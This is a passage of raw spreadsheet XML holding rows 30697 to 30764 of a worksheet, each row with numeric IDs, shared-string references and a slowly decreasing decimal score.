        <v>11783.0</v>
      </c>
      <c r="B30697" s="2">
        <v>2.4301488E7</v>
      </c>
      <c r="C30697" s="2" t="s">
        <v>29515</v>
      </c>
      <c r="D30697" s="2">
        <v>1.0</v>
      </c>
      <c r="E30697" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30697" s="2">
        <v>0.1161616161616161</v>
      </c>
    </row>
    <row r="30698" ht="15.75" customHeight="1">
      <c r="A30698" s="1">
        <v>15542.0</v>
      </c>
      <c r="B30698" s="2">
        <v>4.3376929E7</v>
      </c>
      <c r="C30698" s="2" t="s">
        <v>29516</v>
      </c>
      <c r="D30698" s="2">
        <v>1.0</v>
      </c>
      <c r="E30698" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30698" s="2">
        <v>0.1161616161616161</v>
      </c>
    </row>
    <row r="30699" ht="15.75" customHeight="1">
      <c r="A30699" s="1">
        <v>32885.0</v>
      </c>
      <c r="B30699" s="2">
        <v>6356526.0</v>
      </c>
      <c r="C30699" s="2" t="s">
        <v>29517</v>
      </c>
      <c r="D30699" s="2">
        <v>1.0</v>
      </c>
      <c r="E30699" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30699" s="2">
        <v>0.1161616161616161</v>
      </c>
    </row>
    <row r="30700" ht="15.75" customHeight="1">
      <c r="A30700" s="1">
        <v>7809.0</v>
      </c>
      <c r="B30700" s="2">
        <v>5.223788E7</v>
      </c>
      <c r="C30700" s="2" t="s">
        <v>29518</v>
      </c>
      <c r="D30700" s="2">
        <v>1.0</v>
      </c>
      <c r="E30700" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30700" s="2">
        <v>0.1160714285714286</v>
      </c>
    </row>
    <row r="30701" ht="15.75" customHeight="1">
      <c r="A30701" s="1">
        <v>10690.0</v>
      </c>
      <c r="B30701" s="2">
        <v>1.4713948E7</v>
      </c>
      <c r="C30701" s="2" t="s">
        <v>29519</v>
      </c>
      <c r="D30701" s="2">
        <v>1.0</v>
      </c>
      <c r="E30701" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30701" s="2">
        <v>0.1160714285714286</v>
      </c>
    </row>
    <row r="30702" ht="15.75" customHeight="1">
      <c r="A30702" s="1">
        <v>12272.0</v>
      </c>
      <c r="B30702" s="2">
        <v>2.8116809E7</v>
      </c>
      <c r="C30702" s="2" t="s">
        <v>29520</v>
      </c>
      <c r="D30702" s="2">
        <v>1.0</v>
      </c>
      <c r="E30702" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30702" s="2">
        <v>0.1160714285714286</v>
      </c>
    </row>
    <row r="30703" ht="15.75" customHeight="1">
      <c r="A30703" s="1">
        <v>19923.0</v>
      </c>
      <c r="B30703" s="2">
        <v>5.7432739E7</v>
      </c>
      <c r="C30703" s="2" t="s">
        <v>29521</v>
      </c>
      <c r="D30703" s="2">
        <v>1.0</v>
      </c>
      <c r="E30703" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30703" s="2">
        <v>0.1160714285714286</v>
      </c>
    </row>
    <row r="30704" ht="15.75" customHeight="1">
      <c r="A30704" s="1">
        <v>20679.0</v>
      </c>
      <c r="B30704" s="2">
        <v>1.4425249E7</v>
      </c>
      <c r="C30704" s="2" t="s">
        <v>29522</v>
      </c>
      <c r="D30704" s="2">
        <v>1.0</v>
      </c>
      <c r="E30704" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30704" s="2">
        <v>0.1160714285714286</v>
      </c>
    </row>
    <row r="30705" ht="15.75" customHeight="1">
      <c r="A30705" s="1">
        <v>22521.0</v>
      </c>
      <c r="B30705" s="2">
        <v>3.7650691E7</v>
      </c>
      <c r="C30705" s="2" t="s">
        <v>29523</v>
      </c>
      <c r="D30705" s="2">
        <v>1.0</v>
      </c>
      <c r="E30705" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30705" s="2">
        <v>0.1160714285714286</v>
      </c>
    </row>
    <row r="30706" ht="15.75" customHeight="1">
      <c r="A30706" s="1">
        <v>29185.0</v>
      </c>
      <c r="B30706" s="2">
        <v>3.0715599E7</v>
      </c>
      <c r="C30706" s="2" t="s">
        <v>29524</v>
      </c>
      <c r="D30706" s="2">
        <v>1.0</v>
      </c>
      <c r="E30706" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30706" s="2">
        <v>0.1160714285714286</v>
      </c>
    </row>
    <row r="30707" ht="15.75" customHeight="1">
      <c r="A30707" s="1">
        <v>12779.0</v>
      </c>
      <c r="B30707" s="2">
        <v>3.1337824E7</v>
      </c>
      <c r="C30707" s="2" t="s">
        <v>29525</v>
      </c>
      <c r="D30707" s="2">
        <v>1.0</v>
      </c>
      <c r="E30707" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30707" s="2">
        <v>0.1160714285714285</v>
      </c>
    </row>
    <row r="30708" ht="15.75" customHeight="1">
      <c r="A30708" s="1">
        <v>25303.0</v>
      </c>
      <c r="B30708" s="2">
        <v>1.341421E7</v>
      </c>
      <c r="C30708" s="2" t="s">
        <v>29526</v>
      </c>
      <c r="D30708" s="2">
        <v>1.0</v>
      </c>
      <c r="E30708" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30708" s="2">
        <v>0.1160714285714285</v>
      </c>
    </row>
    <row r="30709" ht="15.75" customHeight="1">
      <c r="A30709" s="1">
        <v>5917.0</v>
      </c>
      <c r="B30709" s="2">
        <v>4.7211545E7</v>
      </c>
      <c r="C30709" s="2" t="s">
        <v>29527</v>
      </c>
      <c r="D30709" s="2">
        <v>1.0</v>
      </c>
      <c r="E30709" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30709" s="2">
        <v>0.1159844054580897</v>
      </c>
    </row>
    <row r="30710" ht="15.75" customHeight="1">
      <c r="A30710" s="1">
        <v>7866.0</v>
      </c>
      <c r="B30710" s="2">
        <v>5.2394503E7</v>
      </c>
      <c r="C30710" s="2" t="s">
        <v>29528</v>
      </c>
      <c r="D30710" s="2">
        <v>1.0</v>
      </c>
      <c r="E30710" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30710" s="2">
        <v>0.1159844054580897</v>
      </c>
    </row>
    <row r="30711" ht="15.75" customHeight="1">
      <c r="A30711" s="1">
        <v>22828.0</v>
      </c>
      <c r="B30711" s="2">
        <v>4.6419601E7</v>
      </c>
      <c r="C30711" s="2" t="s">
        <v>29529</v>
      </c>
      <c r="D30711" s="2">
        <v>1.0</v>
      </c>
      <c r="E30711" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30711" s="2">
        <v>0.1159844054580897</v>
      </c>
    </row>
    <row r="30712" ht="15.75" customHeight="1">
      <c r="A30712" s="1">
        <v>29822.0</v>
      </c>
      <c r="B30712" s="2">
        <v>3.5294545E7</v>
      </c>
      <c r="C30712" s="2" t="s">
        <v>29530</v>
      </c>
      <c r="D30712" s="2">
        <v>1.0</v>
      </c>
      <c r="E30712" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30712" s="2">
        <v>0.1159844054580897</v>
      </c>
    </row>
    <row r="30713" ht="15.75" customHeight="1">
      <c r="A30713" s="1">
        <v>16885.0</v>
      </c>
      <c r="B30713" s="2">
        <v>4.8015854E7</v>
      </c>
      <c r="C30713" s="2" t="s">
        <v>29531</v>
      </c>
      <c r="D30713" s="2">
        <v>1.0</v>
      </c>
      <c r="E30713" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30713" s="2">
        <v>0.1159003831417625</v>
      </c>
    </row>
    <row r="30714" ht="15.75" customHeight="1">
      <c r="A30714" s="1">
        <v>20404.0</v>
      </c>
      <c r="B30714" s="2">
        <v>1.2200205E7</v>
      </c>
      <c r="C30714" s="2" t="s">
        <v>29532</v>
      </c>
      <c r="D30714" s="2">
        <v>1.0</v>
      </c>
      <c r="E30714" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30714" s="2">
        <v>0.1159003831417624</v>
      </c>
    </row>
    <row r="30715" ht="15.75" customHeight="1">
      <c r="A30715" s="1">
        <v>28191.0</v>
      </c>
      <c r="B30715" s="2">
        <v>2.500689E7</v>
      </c>
      <c r="C30715" s="2" t="s">
        <v>29533</v>
      </c>
      <c r="D30715" s="2">
        <v>1.0</v>
      </c>
      <c r="E30715" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30715" s="2">
        <v>0.1159003831417624</v>
      </c>
    </row>
    <row r="30716" ht="15.75" customHeight="1">
      <c r="A30716" s="1">
        <v>17880.0</v>
      </c>
      <c r="B30716" s="2">
        <v>5.1040952E7</v>
      </c>
      <c r="C30716" s="2" t="s">
        <v>29534</v>
      </c>
      <c r="D30716" s="2">
        <v>1.0</v>
      </c>
      <c r="E30716" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30716" s="2">
        <v>0.115819209039548</v>
      </c>
    </row>
    <row r="30717" ht="15.75" customHeight="1">
      <c r="A30717" s="1">
        <v>421.0</v>
      </c>
      <c r="B30717" s="2">
        <v>1.6850133E7</v>
      </c>
      <c r="C30717" s="2" t="s">
        <v>29535</v>
      </c>
      <c r="D30717" s="2">
        <v>1.0</v>
      </c>
      <c r="E30717" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30717" s="2">
        <v>0.1157407407407407</v>
      </c>
    </row>
    <row r="30718" ht="15.75" customHeight="1">
      <c r="A30718" s="1">
        <v>1222.0</v>
      </c>
      <c r="B30718" s="2">
        <v>2487911.0</v>
      </c>
      <c r="C30718" s="2" t="s">
        <v>29536</v>
      </c>
      <c r="D30718" s="2">
        <v>1.0</v>
      </c>
      <c r="E30718" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30718" s="2">
        <v>0.1157407407407407</v>
      </c>
    </row>
    <row r="30719" ht="15.75" customHeight="1">
      <c r="A30719" s="1">
        <v>19393.0</v>
      </c>
      <c r="B30719" s="2">
        <v>5.5565715E7</v>
      </c>
      <c r="C30719" s="2" t="s">
        <v>29537</v>
      </c>
      <c r="D30719" s="2">
        <v>1.0</v>
      </c>
      <c r="E30719" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30719" s="2">
        <v>0.1157407407407407</v>
      </c>
    </row>
    <row r="30720" ht="15.75" customHeight="1">
      <c r="A30720" s="1">
        <v>22970.0</v>
      </c>
      <c r="B30720" s="2">
        <v>4924056.0</v>
      </c>
      <c r="C30720" s="2" t="s">
        <v>6130</v>
      </c>
      <c r="D30720" s="2">
        <v>1.0</v>
      </c>
      <c r="E30720" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30720" s="2">
        <v>0.1157407407407407</v>
      </c>
    </row>
    <row r="30721" ht="15.75" customHeight="1">
      <c r="A30721" s="1">
        <v>24317.0</v>
      </c>
      <c r="B30721" s="2">
        <v>1.0604538E7</v>
      </c>
      <c r="C30721" s="2" t="s">
        <v>29538</v>
      </c>
      <c r="D30721" s="2">
        <v>1.0</v>
      </c>
      <c r="E30721" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30721" s="2">
        <v>0.1157407407407407</v>
      </c>
    </row>
    <row r="30722" ht="15.75" customHeight="1">
      <c r="A30722" s="1">
        <v>33060.0</v>
      </c>
      <c r="B30722" s="2">
        <v>6826175.0</v>
      </c>
      <c r="C30722" s="2" t="s">
        <v>29539</v>
      </c>
      <c r="D30722" s="2">
        <v>1.0</v>
      </c>
      <c r="E30722" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30722" s="2">
        <v>0.1157407407407407</v>
      </c>
    </row>
    <row r="30723" ht="15.75" customHeight="1">
      <c r="A30723" s="1">
        <v>10020.0</v>
      </c>
      <c r="B30723" s="2">
        <v>5.7042901E7</v>
      </c>
      <c r="C30723" s="2" t="s">
        <v>29540</v>
      </c>
      <c r="D30723" s="2">
        <v>1.0</v>
      </c>
      <c r="E30723" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30723" s="2">
        <v>0.1156648451730419</v>
      </c>
    </row>
    <row r="30724" ht="15.75" customHeight="1">
      <c r="A30724" s="1">
        <v>14589.0</v>
      </c>
      <c r="B30724" s="2">
        <v>4.0149329E7</v>
      </c>
      <c r="C30724" s="2" t="s">
        <v>29541</v>
      </c>
      <c r="D30724" s="2">
        <v>1.0</v>
      </c>
      <c r="E30724" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30724" s="2">
        <v>0.1156648451730419</v>
      </c>
    </row>
    <row r="30725" ht="15.75" customHeight="1">
      <c r="A30725" s="1">
        <v>29377.0</v>
      </c>
      <c r="B30725" s="2">
        <v>3.1756848E7</v>
      </c>
      <c r="C30725" s="2" t="s">
        <v>29542</v>
      </c>
      <c r="D30725" s="2">
        <v>1.0</v>
      </c>
      <c r="E30725" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30725" s="2">
        <v>0.1156648451730419</v>
      </c>
    </row>
    <row r="30726" ht="15.75" customHeight="1">
      <c r="A30726" s="1">
        <v>900.0</v>
      </c>
      <c r="B30726" s="2">
        <v>2.2123456E7</v>
      </c>
      <c r="C30726" s="2" t="s">
        <v>29543</v>
      </c>
      <c r="D30726" s="2">
        <v>1.0</v>
      </c>
      <c r="E30726" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30726" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="30727" ht="15.75" customHeight="1">
      <c r="A30727" s="1">
        <v>4367.0</v>
      </c>
      <c r="B30727" s="2">
        <v>4.2122553E7</v>
      </c>
      <c r="C30727" s="2" t="s">
        <v>29544</v>
      </c>
      <c r="D30727" s="2">
        <v>1.0</v>
      </c>
      <c r="E30727" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30727" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="30728" ht="15.75" customHeight="1">
      <c r="A30728" s="1">
        <v>6269.0</v>
      </c>
      <c r="B30728" s="2">
        <v>4.8127617E7</v>
      </c>
      <c r="C30728" s="2" t="s">
        <v>29545</v>
      </c>
      <c r="D30728" s="2">
        <v>1.0</v>
      </c>
      <c r="E30728" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30728" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="30729" ht="15.75" customHeight="1">
      <c r="A30729" s="1">
        <v>6850.0</v>
      </c>
      <c r="B30729" s="2">
        <v>4.9642181E7</v>
      </c>
      <c r="C30729" s="2" t="s">
        <v>29546</v>
      </c>
      <c r="D30729" s="2">
        <v>1.0</v>
      </c>
      <c r="E30729" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30729" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="30730" ht="15.75" customHeight="1">
      <c r="A30730" s="1">
        <v>8765.0</v>
      </c>
      <c r="B30730" s="2">
        <v>5.4581735E7</v>
      </c>
      <c r="C30730" s="2" t="s">
        <v>29547</v>
      </c>
      <c r="D30730" s="2">
        <v>1.0</v>
      </c>
      <c r="E30730" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30730" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="30731" ht="15.75" customHeight="1">
      <c r="A30731" s="1">
        <v>10101.0</v>
      </c>
      <c r="B30731" s="2">
        <v>5.7208796E7</v>
      </c>
      <c r="C30731" s="2" t="s">
        <v>29548</v>
      </c>
      <c r="D30731" s="2">
        <v>1.0</v>
      </c>
      <c r="E30731" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30731" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="30732" ht="15.75" customHeight="1">
      <c r="A30732" s="1">
        <v>12250.0</v>
      </c>
      <c r="B30732" s="2">
        <v>2.7931137E7</v>
      </c>
      <c r="C30732" s="2" t="s">
        <v>29549</v>
      </c>
      <c r="D30732" s="2">
        <v>1.0</v>
      </c>
      <c r="E30732" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30732" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="30733" ht="15.75" customHeight="1">
      <c r="A30733" s="1">
        <v>12456.0</v>
      </c>
      <c r="B30733" s="2">
        <v>2.9345871E7</v>
      </c>
      <c r="C30733" s="2" t="s">
        <v>29550</v>
      </c>
      <c r="D30733" s="2">
        <v>1.0</v>
      </c>
      <c r="E30733" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30733" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="30734" ht="15.75" customHeight="1">
      <c r="A30734" s="1">
        <v>12480.0</v>
      </c>
      <c r="B30734" s="2">
        <v>2.9498823E7</v>
      </c>
      <c r="C30734" s="2" t="s">
        <v>29551</v>
      </c>
      <c r="D30734" s="2">
        <v>1.0</v>
      </c>
      <c r="E30734" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30734" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="30735" ht="15.75" customHeight="1">
      <c r="A30735" s="1">
        <v>13652.0</v>
      </c>
      <c r="B30735" s="2">
        <v>3.5944947E7</v>
      </c>
      <c r="C30735" s="2" t="s">
        <v>29552</v>
      </c>
      <c r="D30735" s="2">
        <v>1.0</v>
      </c>
      <c r="E30735" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30735" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="30736" ht="15.75" customHeight="1">
      <c r="A30736" s="1">
        <v>17220.0</v>
      </c>
      <c r="B30736" s="2">
        <v>4.9061649E7</v>
      </c>
      <c r="C30736" s="2" t="s">
        <v>29553</v>
      </c>
      <c r="D30736" s="2">
        <v>1.0</v>
      </c>
      <c r="E30736" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30736" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="30737" ht="15.75" customHeight="1">
      <c r="A30737" s="1">
        <v>19550.0</v>
      </c>
      <c r="B30737" s="2">
        <v>5.605664E7</v>
      </c>
      <c r="C30737" s="2" t="s">
        <v>29554</v>
      </c>
      <c r="D30737" s="2">
        <v>1.0</v>
      </c>
      <c r="E30737" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30737" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="30738" ht="15.75" customHeight="1">
      <c r="A30738" s="1">
        <v>22546.0</v>
      </c>
      <c r="B30738" s="2">
        <v>3.8123257E7</v>
      </c>
      <c r="C30738" s="2" t="s">
        <v>29555</v>
      </c>
      <c r="D30738" s="2">
        <v>1.0</v>
      </c>
      <c r="E30738" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30738" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="30739" ht="15.75" customHeight="1">
      <c r="A30739" s="1">
        <v>22549.0</v>
      </c>
      <c r="B30739" s="2">
        <v>3.8138262E7</v>
      </c>
      <c r="C30739" s="2" t="s">
        <v>29555</v>
      </c>
      <c r="D30739" s="2">
        <v>1.0</v>
      </c>
      <c r="E30739" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30739" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="30740" ht="15.75" customHeight="1">
      <c r="A30740" s="1">
        <v>26006.0</v>
      </c>
      <c r="B30740" s="2">
        <v>1.5333981E7</v>
      </c>
      <c r="C30740" s="2" t="s">
        <v>29556</v>
      </c>
      <c r="D30740" s="2">
        <v>1.0</v>
      </c>
      <c r="E30740" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30740" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="30741" ht="15.75" customHeight="1">
      <c r="A30741" s="1">
        <v>28029.0</v>
      </c>
      <c r="B30741" s="2">
        <v>2.4450881E7</v>
      </c>
      <c r="C30741" s="2" t="s">
        <v>29557</v>
      </c>
      <c r="D30741" s="2">
        <v>1.0</v>
      </c>
      <c r="E30741" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30741" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="30742" ht="15.75" customHeight="1">
      <c r="A30742" s="1">
        <v>28383.0</v>
      </c>
      <c r="B30742" s="2">
        <v>2.6115997E7</v>
      </c>
      <c r="C30742" s="2" t="s">
        <v>29558</v>
      </c>
      <c r="D30742" s="2">
        <v>1.0</v>
      </c>
      <c r="E30742" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30742" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="30743" ht="15.75" customHeight="1">
      <c r="A30743" s="1">
        <v>29612.0</v>
      </c>
      <c r="B30743" s="2">
        <v>3.3619599E7</v>
      </c>
      <c r="C30743" s="2" t="s">
        <v>29559</v>
      </c>
      <c r="D30743" s="2">
        <v>1.0</v>
      </c>
      <c r="E30743" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30743" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="30744" ht="15.75" customHeight="1">
      <c r="A30744" s="1">
        <v>32418.0</v>
      </c>
      <c r="B30744" s="2">
        <v>5.6420906E7</v>
      </c>
      <c r="C30744" s="2" t="s">
        <v>29560</v>
      </c>
      <c r="D30744" s="2">
        <v>1.0</v>
      </c>
      <c r="E30744" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30744" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="30745" ht="15.75" customHeight="1">
      <c r="A30745" s="1">
        <v>33214.0</v>
      </c>
      <c r="B30745" s="2">
        <v>7222177.0</v>
      </c>
      <c r="C30745" s="2" t="s">
        <v>29561</v>
      </c>
      <c r="D30745" s="2">
        <v>1.0</v>
      </c>
      <c r="E30745" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30745" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="30746" ht="15.75" customHeight="1">
      <c r="A30746" s="1">
        <v>16898.0</v>
      </c>
      <c r="B30746" s="2">
        <v>4.8073046E7</v>
      </c>
      <c r="C30746" s="2" t="s">
        <v>29562</v>
      </c>
      <c r="D30746" s="2">
        <v>1.0</v>
      </c>
      <c r="E30746" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30746" s="2">
        <v>0.1155202821869489</v>
      </c>
    </row>
    <row r="30747" ht="15.75" customHeight="1">
      <c r="A30747" s="1">
        <v>17215.0</v>
      </c>
      <c r="B30747" s="2">
        <v>4.9055725E7</v>
      </c>
      <c r="C30747" s="2" t="s">
        <v>29563</v>
      </c>
      <c r="D30747" s="2">
        <v>1.0</v>
      </c>
      <c r="E30747" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30747" s="2">
        <v>0.1155202821869489</v>
      </c>
    </row>
    <row r="30748" ht="15.75" customHeight="1">
      <c r="A30748" s="1">
        <v>3959.0</v>
      </c>
      <c r="B30748" s="2">
        <v>4.0704535E7</v>
      </c>
      <c r="C30748" s="2" t="s">
        <v>29564</v>
      </c>
      <c r="D30748" s="2">
        <v>1.0</v>
      </c>
      <c r="E30748" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30748" s="2">
        <v>0.1150234741784038</v>
      </c>
    </row>
    <row r="30749" ht="15.75" customHeight="1">
      <c r="A30749" s="1">
        <v>24153.0</v>
      </c>
      <c r="B30749" s="2">
        <v>1.0082764E7</v>
      </c>
      <c r="C30749" s="2" t="s">
        <v>29565</v>
      </c>
      <c r="D30749" s="2">
        <v>1.0</v>
      </c>
      <c r="E30749" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30749" s="2">
        <v>0.1143162393162393</v>
      </c>
    </row>
    <row r="30750" ht="15.75" customHeight="1">
      <c r="A30750" s="1">
        <v>208.0</v>
      </c>
      <c r="B30750" s="2">
        <v>1.455519E7</v>
      </c>
      <c r="C30750" s="2" t="s">
        <v>29566</v>
      </c>
      <c r="D30750" s="2">
        <v>1.0</v>
      </c>
      <c r="E30750" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30750" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="30751" ht="15.75" customHeight="1">
      <c r="A30751" s="1">
        <v>3522.0</v>
      </c>
      <c r="B30751" s="2">
        <v>3.8602692E7</v>
      </c>
      <c r="C30751" s="2" t="s">
        <v>29567</v>
      </c>
      <c r="D30751" s="2">
        <v>1.0</v>
      </c>
      <c r="E30751" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30751" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="30752" ht="15.75" customHeight="1">
      <c r="A30752" s="1">
        <v>4554.0</v>
      </c>
      <c r="B30752" s="2">
        <v>4.2693285E7</v>
      </c>
      <c r="C30752" s="2" t="s">
        <v>29568</v>
      </c>
      <c r="D30752" s="2">
        <v>1.0</v>
      </c>
      <c r="E30752" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30752" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="30753" ht="15.75" customHeight="1">
      <c r="A30753" s="1">
        <v>5581.0</v>
      </c>
      <c r="B30753" s="2">
        <v>4.6057E7</v>
      </c>
      <c r="C30753" s="2" t="s">
        <v>29569</v>
      </c>
      <c r="D30753" s="2">
        <v>1.0</v>
      </c>
      <c r="E30753" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30753" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="30754" ht="15.75" customHeight="1">
      <c r="A30754" s="1">
        <v>7356.0</v>
      </c>
      <c r="B30754" s="2">
        <v>5.099996E7</v>
      </c>
      <c r="C30754" s="2" t="s">
        <v>29570</v>
      </c>
      <c r="D30754" s="2">
        <v>1.0</v>
      </c>
      <c r="E30754" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30754" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="30755" ht="15.75" customHeight="1">
      <c r="A30755" s="1">
        <v>7972.0</v>
      </c>
      <c r="B30755" s="2">
        <v>5.2699843E7</v>
      </c>
      <c r="C30755" s="2" t="s">
        <v>29571</v>
      </c>
      <c r="D30755" s="2">
        <v>1.0</v>
      </c>
      <c r="E30755" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30755" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="30756" ht="15.75" customHeight="1">
      <c r="A30756" s="1">
        <v>18048.0</v>
      </c>
      <c r="B30756" s="2">
        <v>5.1572696E7</v>
      </c>
      <c r="C30756" s="2" t="s">
        <v>29572</v>
      </c>
      <c r="D30756" s="2">
        <v>1.0</v>
      </c>
      <c r="E30756" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30756" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="30757" ht="15.75" customHeight="1">
      <c r="A30757" s="1">
        <v>27441.0</v>
      </c>
      <c r="B30757" s="2">
        <v>2.1981057E7</v>
      </c>
      <c r="C30757" s="2" t="s">
        <v>29573</v>
      </c>
      <c r="D30757" s="2">
        <v>1.0</v>
      </c>
      <c r="E30757" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30757" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="30758" ht="15.75" customHeight="1">
      <c r="A30758" s="1">
        <v>28368.0</v>
      </c>
      <c r="B30758" s="2">
        <v>2.6035685E7</v>
      </c>
      <c r="C30758" s="2" t="s">
        <v>29574</v>
      </c>
      <c r="D30758" s="2">
        <v>1.0</v>
      </c>
      <c r="E30758" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30758" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="30759" ht="15.75" customHeight="1">
      <c r="A30759" s="1">
        <v>164.0</v>
      </c>
      <c r="B30759" s="2">
        <v>1.375984E7</v>
      </c>
      <c r="C30759" s="2" t="s">
        <v>29575</v>
      </c>
      <c r="D30759" s="2">
        <v>1.0</v>
      </c>
      <c r="E30759" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30759" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30760" ht="15.75" customHeight="1">
      <c r="A30760" s="1">
        <v>985.0</v>
      </c>
      <c r="B30760" s="2">
        <v>2.2873155E7</v>
      </c>
      <c r="C30760" s="2" t="s">
        <v>29576</v>
      </c>
      <c r="D30760" s="2">
        <v>1.0</v>
      </c>
      <c r="E30760" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30760" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30761" ht="15.75" customHeight="1">
      <c r="A30761" s="1">
        <v>1027.0</v>
      </c>
      <c r="B30761" s="2">
        <v>2.3175354E7</v>
      </c>
      <c r="C30761" s="2" t="s">
        <v>29577</v>
      </c>
      <c r="D30761" s="2">
        <v>1.0</v>
      </c>
      <c r="E30761" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30761" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30762" ht="15.75" customHeight="1">
      <c r="A30762" s="1">
        <v>1084.0</v>
      </c>
      <c r="B30762" s="2">
        <v>2.3718734E7</v>
      </c>
      <c r="C30762" s="2" t="s">
        <v>29578</v>
      </c>
      <c r="D30762" s="2">
        <v>1.0</v>
      </c>
      <c r="E30762" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30762" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30763" ht="15.75" customHeight="1">
      <c r="A30763" s="1">
        <v>1091.0</v>
      </c>
      <c r="B30763" s="2">
        <v>2.3769819E7</v>
      </c>
      <c r="C30763" s="2" t="s">
        <v>29579</v>
      </c>
      <c r="D30763" s="2">
        <v>1.0</v>
      </c>
      <c r="E30763" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30763" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="30764" ht="15.75" customHeight="1">
      <c r="A30764" s="1">
        <v>1628.0</v>
